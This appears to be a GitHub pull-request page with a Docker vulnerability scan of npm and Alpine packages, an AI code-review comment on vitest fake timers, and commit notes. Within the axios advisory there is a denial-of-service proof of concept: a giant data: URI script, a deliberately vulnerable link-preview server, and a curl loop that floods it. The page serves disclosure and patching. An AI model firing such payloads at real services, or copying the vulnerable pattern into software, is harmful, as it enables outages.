Affected range<=10.0_p1-r7
Fixed versionNot Fixed
EPSS Score0.008%
EPSS Percentile1st percentile
Description
critical: 0 high: 1 medium: 0 low: 0 axios 1.8.3 (npm)

pkg:npm/axios@1.8.3

high 7.5: CVE--2025--58754 Allocation of Resources Without Limits or Throttling

Affected range>=1.0.0
<1.12.0
Fixed version1.12.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.025%
EPSS Percentile5th percentile
Description

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength , maxBodyLength and decodes into memory on Node before streaming enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send 3 post requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.

critical: 0 high: 1 medium: 0 low: 0 tar-fs 2.1.3 (npm)

pkg:npm/tar-fs@2.1.3

high 8.7: CVE--2025--59343 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range>=2.0.0
<2.1.4
Fixed version2.1.4
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score0.024%
EPSS Percentile5th percentile
Description

Impact

v3.1.0, v2.1.3, v1.16.5 and below

Patches

Has been patched in 3.1.1, 2.1.4, and 1.16.6

Workarounds

You can use the ignore option to ignore non files/directories.

  ignore (_, header) {
    // pass files & directories, ignore e.g. symlinks
    return header.type !== 'file' && header.type !== 'directory'
  }

Credit

Reported by: Mapta / BugBunny_ai

critical: 0 high: 1 medium: 0 low: 0 n8n 1.109.2 (npm)

pkg:npm/n8n@1.109.2

high 8.8: GHSA--365g--vjw2--grx8 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Affected range<=1.114.4
Fixed versionNot Fixed
CVSS Score8.8
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description

Impact

The Execute Command node in n8n allows execution of arbitrary commands on the host system where n8n runs. While this functionality is intended for advanced automation and can be useful in certain workflows, it poses a security risk if all users with access to the n8n instance are not fully trusted.

An attacker—either a malicious user or someone who has compromised a legitimate user account—could exploit this node to run arbitrary commands on the host machine, potentially leading to data exfiltration, service disruption, or full system compromise.

This vulnerability affects all n8n deployments where:

  • The Execute Command node is enabled, and
  • Not all user accounts are strictly controlled and trusted.

n8n.cloud is not impacted.

Patches

No code changes have been made to alter the behavior of the Execute Command node. The recommended mitigation is to disable the node by default in environments where it is not explicitly required.

Future n8n versions may change the default availability of this node.

Workarounds

Administrators can disable the Execute Command node by setting the following environment variable before starting n8n:

export NODES_EXCLUDE: "[\"n8n-nodes-base.executeCommand\"]"

References

n8n docs: Execute Command
n8n docs: Blocking nodes

critical: 0 high: 1 medium: 0 low: 0 openssl 3.5.2-r0 (apk)

pkg:apk/alpine/openssl@3.5.2-r0?os_name=alpine&os_version=3.22

high : CVE--2025--9230

Affected range<3.5.4-r0
Fixed version3.5.4-r0
EPSS Score0.026%
EPSS Percentile6th percentile
Description
critical: 0 high: 1 medium: 0 low: 0 expat 2.7.1-r0 (apk)

pkg:apk/alpine/expat@2.7.1-r0?os_name=alpine&os_version=3.22

high : CVE--2025--59375

Affected range<2.7.2-r0
Fixed version2.7.2-r0
EPSS Score0.102%
EPSS Percentile29th percentile
Description

Copy link

@coderabbitai coderabbitai bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 1

📜 Review details

Configuration used: Path: .coderabbit.yml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 9345894 and f629b57.

📒 Files selected for processing (1)
  • workers/main/src/index.test.ts (2 hunks)
🧰 Additional context used
📓 Path-based instructions (2)
**/*.test.ts

📄 CodeRabbit inference engine (CLAUDE.md)

Tests are co-located with source files and should be named with the pattern *.test.ts

Files:

  • workers/main/src/index.test.ts
**/*.{ts,tsx}

📄 CodeRabbit inference engine (CLAUDE.md)

**/*.{ts,tsx}: Follow the function naming pattern: prefix? + action (A) + high context (HC) + low context? (LC), using action verbs such as get, fetch, send, create, validate, handle, calculate, and boolean prefixes is, has, should
Use descriptive, unabbreviated variable names; use singular for single values and plural for collections; ensure variable names are context-specific

Files:

  • workers/main/src/index.test.ts
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (4)
  • GitHub Check: Docker Security Scanning (temporal, Dockerfile.temporal, temporal-test:latest)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check
  • GitHub Check: SonarQube
🔇 Additional comments (1)
workers/main/src/index.test.ts (1)

19-20: LGTM: Proper timer cleanup.

The cleanup properly clears pending timers and restores real timers, following best practices for test isolation. This is good test hygiene, though it's only necessary if fake timers are actually being used.

Comment on lines +9 to +10
vi.useFakeTimers();

Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

Verify timer usage in handleRunError implementation.

Fake timers are configured but the tests don't explicitly advance or control them. If handleRunError uses timers (e.g., delayed process.exit), the tests should verify that behavior with vi.advanceTimersByTime() or vi.runAllTimers(). If it doesn't use timers, this setup adds unnecessary overhead.

Run the following script to check if handleRunError uses timer functions:


🏁 Script executed:

#!/bin/bash
# Description: Check if handleRunError implementation uses setTimeout, setInterval, or other timer functions

# Search for handleRunError implementation and timer usage
ast-grep --pattern 'function handleRunError($$$) {
  $$$
}'

# Also search for timer-related calls in the index.ts file
rg -n 'setTimeout|setInterval|clearTimeout|clearInterval' workers/main/src/index.ts

Length of output: 44


I need to check the actual test implementations to see if they're advancing timers or if they're missing this critical step.


🏁 Script executed:

#!/bin/bash
# View the handleRunError implementation and surrounding context
cat workers/main/src/index.ts | head -60 | tail -20

echo "---"

# View the full test file to see if timers are being advanced
cat workers/main/src/index.test.ts

Length of output: 1929


Tests must verify the 100ms process.exit behavior when fake timers are enabled.

The test setup enables fake timers and mocks process.exit, but the tests never advance timers to trigger the setTimeout callback. Without calling vi.advanceTimersByTime(100) or vi.runAllTimers(), the process.exit(1) is never invoked and remains untested. Each test should advance timers after calling handleRunError() and verify that process.exit(1) was called.

Example fix:

it('should exit with code 1 after 100ms', () => {
  const error = new Error('test error');
  const logSpy = vi.spyOn(logger, 'error').mockImplementation(() => {});

  handleRunError(error);
  expect(logSpy).toHaveBeenCalledWith(
    `Error in main worker: ${error.message}`,
  );
  
  vi.advanceTimersByTime(100);
  expect(processExitSpy).toHaveBeenCalledWith(1);
  
  logSpy.mockRestore();
});
🤖 Prompt for AI Agents
In workers/main/src/index.test.ts around lines 9-10, tests enable fake timers
but never advance them so the 100ms setTimeout that calls process.exit(1) is
never executed; update each relevant test to advance timers (e.g.,
vi.advanceTimersByTime(100) or vi.runAllTimers()) after invoking
handleRunError(), then assert that the mocked process.exit was called with 1,
and restore any spies/mocks.

- Introduced a new docker-compose.local.yml file for local development, enabling SSH tunneling for Redmine and MongoDB services.
- Updated README.md to include instructions for using the new local development configuration, clarifying the usage of different docker-compose files for various environments.

These changes enhance the development workflow by providing a dedicated configuration for local setups.
- Implemented fake timers using vi.useFakeTimers() to control setTimeout behavior during tests.
- Restored real timers and cleared pending timers in afterEach to ensure a clean test environment.

These changes improve the reliability of tests by preventing unintended delays and ensuring proper timer management.
@anatolyshipitz anatolyshipitz force-pushed the chore/docker-compose-local-explicit branch from f629b57 to 8b253f4 Compare October 29, 2025 09:45
@anatolyshipitz anatolyshipitz marked this pull request as draft October 29, 2025 09:45
@sonarqubecloud
Copy link

1 similar comment
@sonarqubecloud
Copy link

sonarqubecloud bot commented Dec 3, 2025

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants